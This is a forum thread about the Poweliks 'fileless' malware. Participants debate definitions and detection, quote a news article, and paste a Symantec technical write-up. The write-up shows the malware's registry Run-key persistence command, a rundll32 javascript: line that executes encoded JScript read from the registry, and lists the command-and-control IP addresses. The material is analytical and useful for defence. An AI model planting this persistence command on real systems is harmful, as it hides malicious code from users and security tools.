Registry-infecting reboot-resisting malware has NO FILES - Page 3

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View

Re: "Windows Calling a DLL Function" for Dummies



Quoted text here. Click to load it
lose  
Quoted text here. Click to load it
and  
Quoted text here. Click to load it

I use PE-Viewer to help get Libraries Function List

Quoted text here. Click to load it
'clueless  
Quoted text here. Click to load it


I believe Wolf is doing go job
   in getting the right clues  


Re: Registry-infecting reboot-resisting malware has NO FILES

David W. Hodgins expressed precisely :
Quoted text here. Click to load it

Far be it from me to argue that the BIOS is not an OS under some  
definition of OS or that contiguous addresses containing code and data  
isn't a file system under some definition of file system - or that a  
hippopotamus is not an amphibian under some definition of amphibian.

I agree with you that the definition we should be using in the context  
of this discussion is the same one which the analysts were using in the  
original document which is being referenced in all of the FUD/fluff  
articles being bandied about. Files in the sense of what is created  
when you have the OS (Windows) create a file, is what I am calling a  
true file in this context.



Re: Registry-infecting reboot-resisting malware has NO FILES


Quoted text here. Click to load it
files.

To go further.. When I examined a lojack'd laptop a few years ago; The BIOS  
is a big block of code, it has sections (option roms) that is just more  
blocks of potentially executable code. It can be used to store a complete  
win32 PE executable (which is exactly what lojack does). It doesn't have a  
file allocation table, no file system of any sort... It runs from beginning  
to end unless code stored inside tells it otherwise. The BIOS contains code  
and data and as far as the bios is concerned it's all the same stuff. lol.


  


--  
Take it easy... Don't let the sound of your own wheels drive you crazy.  
Lighten up while you still can. Don't even try to understand.  
Just find a place to make your stand and take it easy!


Re: Registry-infecting reboot-resisting malware has NO FILES

Dustin expressed precisely :

[...]

Quoted text here. Click to load it

Conflating JS Encode with non-ASCII naming.

Quoted text here. Click to load it

As has been metioned many many many times before - it is essentially  
'game over' when you allow a malware to execute on your machine. The  
primary goal of AV/AM is to avoid such.

Quoted text here. Click to load it

The author apparently misunderstands quite a bit.

Quoted text here. Click to load it

Again, conflating the two separate issues.

Quoted text here. Click to load it

Yep, it shouldn't be hard at all to find such in the registry. There is  
no legitimate reason for encoded JS in the registry AFAIK.

https://blog.gdatasoftware.com/blog/article/poweliks-the-persistent-malware-without-a-file.html



Re: Registry-infecting reboot-resisting malware has NO FILES


     "The JavaScript code checks whether Windows PowerShell, a
      command-line shell and scripting environment, is present
      on the system. If it isn’t, it downloads and installs it
      and then it decodes some more code that is actually a
      PowerShell script."

Does Powershell run on Win-98?

     "The malicious documents exploited a remote code execution
      vulnerability in Microsoft Office 2003, 2007 and 2010 that
      was patched by Microsoft in April 2012."

Did Office 2000 also have that vulnerability?

     "To block malware like Poweliks, “antivirus solutions have
      to either..."

Why can't (why doesn't) AV software monitor the registry for new startup
keys?

It shouldn't matter that it can't read the target being added to the key
(because of "non-standard" ASCII code) - what should matter is that it
detects changes (additions) to the startup registry keys.

=====================================

Stealthy, tricky 'Poweliks' malware hides in your system registry - but
not your hard drive

A new malware program called Poweliks attempts to evade detection and
analysis by running entirely from the system registry without creating
files on disk, security researchers warn.

The concept of “fileless” malware that only exists in the system’s
memory is not new, but such threats are rare because they typically
don’t survive across system reboots, when the memory is cleared. That’s
not the case for Poweliks, which takes a rather new approach to achieve
persistence while remaining fileless, according to malware researchers
from G Data Software.

When it infects a system, Poweliks creates a startup registry entry that
executes the legitimate rundll32.exe Windows file followed by some
encoded JavaScript code. This triggers a process similar in concept to a
Matryoshka Russian nesting doll, said Paul Rascagnères, senior threat
researcher at G Data, in a blog post.

The JavaScript code checks whether Windows PowerShell, a command-line
shell and scripting environment, is present on the system. If it isn’t,
it downloads and installs it and then it decodes some more code that is
actually a PowerShell script.

The PowerShell script is executed by using a trick to bypass a default
protection in Windows that prevents the launch of unknown PowerShell
scripts without user confirmation, Rascagnères said. The script then
decodes and executes shellcode which injects a DLL (dynamic link
library) directly into the system memory.

Once it is running in memory, the rogue DLL component connects to two IP
(Internet Protocol) addresses in Kazakhstan to receive commands. It can
be used to download and install other threats, depending on the
attacker’s needs and intentions.

During the entire process, from executing the JavaScript code to the
final DLL injection, the malware does not create any malicious files on
the hard disk drive, making it difficult for antivirus programs to
detect it.

Furthermore, the name of the startup registry key created by Poweliks is
a non-ASCII character. This is a trick that prevents regedit—the Windows
registry editor tool—and possibly other programs from displaying the
rogue start-up entry, making it difficult for both users and malware
analysts to manually spot the infection.

Some Poweliks variants have been distributed through malicious Microsoft
Word documents attached to spam emails that purported to come from
Canada Post or USPS. The malicious documents exploited a remote code
execution vulnerability in Microsoft Office 2003, 2007 and 2010 that was
patched by Microsoft in April 2012. However, according to other reports,
the malware is also distributed through drive-by download attacks that
use Web exploits.

To block malware like Poweliks, “antivirus solutions have to either
catch the file (the initial Word document) before it is executed (if
there is one), preferably before it reached the customer’s email inbox,”
Rascagnères said. “Or, as a next line of defense, they need to detect
the software exploit after the file’s execution, or, as a last step,
in-registry surveillance has to detect unusual behavior, block the
corresponding processes and alert the user.”

Security researchers from Trend Micro, who have also analyzed the
threat, believe that other malware creators may adopt the techniques
used by Poweliks in the future.

http://www.pcworld.com/article/2461120/stealthy-malware-poweliks-resides-only-in-system-registry.html

========================

So - Windows 98 is affected?

Symantec has actually verified that?

-------------------------
EarthLink Symantec Page
http://www.earthlink.net/software/nmpremium/norton/

Trojan.Poweliks
Risk Level 1: Very Low

Discovered:
    August 3, 2014
Updated:
    August 4, 2014 10:28:18 AM
Type:
    Trojan
Infection Length:
    71680 bytes
Systems Affected:
    Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows
NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

SUMMARY
Trojan.Poweliks is a Trojan horse that performs malicious activities on
the compromised computer.

Antivirus Protection Dates

    * Initial Rapid Release version August 4, 2014 revision 001
    * Latest Rapid Release version August 4, 2014 revision 001
    * Initial Daily Certified version August 4, 2014 revision 008
    * Latest Daily Certified version August 4, 2014 revision 008
    * Initial Weekly Certified release date August 6, 2014

    * Wild Level: Low
    * Number of Infections: 0 - 49
    * Number of Sites: 0 - 2
    * Geographical Distribution: Low
    * Threat Containment: Easy
    * Removal: Easy

Damage

    * Damage Level: Medium
    * Payload: Opens a back door.

Distribution

    * Distribution Level: Low

TECHNICAL DETAILS
The Trojan may be dropped by Trojan.Mdropper.

When the Trojan is executed, it creates the following registry entries:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"(default)"
= "[ENCRYPTED JAVASCRIPT]"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[NON-ASCII
STRING]" = "rundll32.exe
javascript:\"\..\mshtml,RunHTMLApplication\";document.write(\"script
language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\software\microsoft\windows\currentversion\run\")+\"/script>\")"

The Trojan then checks if the compromised computer has the PowerShell or
.NET frameworks. If not, it will download the installers for these
frameworks from the official Microsoft website.

Next, the Trojan decrypts a PowerShell script from its encrypted
JavaScript. It runs this Powershell script to execute a binary program.
This program connects to the following remote locations:

    * 178.89.159.34
    * 178.89.159.35

http://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2014-080408-5614-99

Re: Registry-infecting reboot-resisting malware has NO FILES

Virus Guy wrote :

Quoting an article:

Quoted text here. Click to load it

How do they think the malware stays persistent? Do they believe in the  
registry fairy?



Site Timeline